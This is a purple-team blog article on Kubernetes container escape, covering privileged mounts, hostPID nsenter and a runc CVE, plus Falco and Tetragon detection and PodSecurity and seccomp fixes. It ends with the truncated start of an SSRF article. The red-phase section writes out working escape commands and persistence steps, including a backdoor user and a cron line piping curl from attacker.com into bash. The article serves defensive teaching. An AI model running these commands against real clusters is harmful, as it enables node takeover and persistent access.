Kubernetes Container Escape: Attack Paths and eBPF Detection

Reading Time: 17 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWSMFA fatigue attacksCI/CD secrets exposureSSRF to cloud metadataKubernetes Container Escape


TL;DR

  • Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host — two commands can produce a root shell on the node
  • The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. --privileged removes those boundaries — the kernel sees no difference between the container and the host
  • Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
  • Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces nsenter and mount syscalls at the point of the kernel hook, not a process name check that can be evaded
  • The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks --privileged, hostPID, hostNetwork, and mounts before a pod ever schedules
  • Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.


The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.


The Incident: –privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds --privileged: true to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The --privileged flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, two commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.


Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with mount, you can fix even the filesystem view.


Red Phase: The Three Escape Paths

Path 1: –privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled, nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.

The mechanism:

1. Attacker controls a container image
2. Image's entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker's process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else "" end),
     (if .spec.hostNetwork then "hostNetwork" else "" end)] |
    join(" / ")' | \
  grep -v "/$" | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_pid_ns"   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: "__x64_sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

  # Hook 3: write to /proc/self/exe — runc CVE class indicator
  kprobes:
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress
# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]
# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r '.items[] |
    select(.message | contains("privileged")) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(" / ")'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.


Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.

gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest
# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

Even without gVisor, a custom seccomp profile that explicitly denies mount, unshare, and clone with namespace flags closes the primary escape syscall surface.

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node
# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny
# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule

⚠ Production Gotchas

Legitimate workloads that require –privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.

Seccomp Restricted blocks some monitoring agents. The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to –privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.


Quick Reference

Escape Path Precondition Detection Signal Structural Fix
Privileged container → mount privileged: true Falco: mount syscall from container; Tetragon: sys_mount kprobe PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter hostPID: true Falco: nsenter exec in container; audit log: pod creation with hostPID PodSecurity Restricted; blocks hostPID
hostNetwork + IMDS hostNetwork: true CloudTrail: IMDSv1 call from unexpected source Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736) Unpatched runc Tetragon: vfs_write to /proc/self/exe Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount hostPath to sensitive path Falco: sensitive host file access; PodSecurity audit PodSecurity Restricted (blocks hostPath)
Escaped → API server Node credential access Audit log: API calls from node IP at unexpected time Network policy blocking node→API server egress

Key Takeaways

  • Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
  • Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
  • eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
  • PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
  • runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
  • Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

Reading Time: 15 minutes

What Is Purple Team?OWASP Top 10 CloudBreach Landscape 2020–2025Broken Access ControlMFA FatigueCI/CD SecretsSSRF to Cloud Metadata


TL;DR

  • SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
  • IMDSv1 (the default before 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient
  • Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
  • IMDSv2 requires a PUT request to obtain a session token first — a CSRF/SSRF-blocked flow — making the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
  • Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer
  • The structural fix is eliminating the credential entirely: OIDC workload identity eliminates static credentials replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.


The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
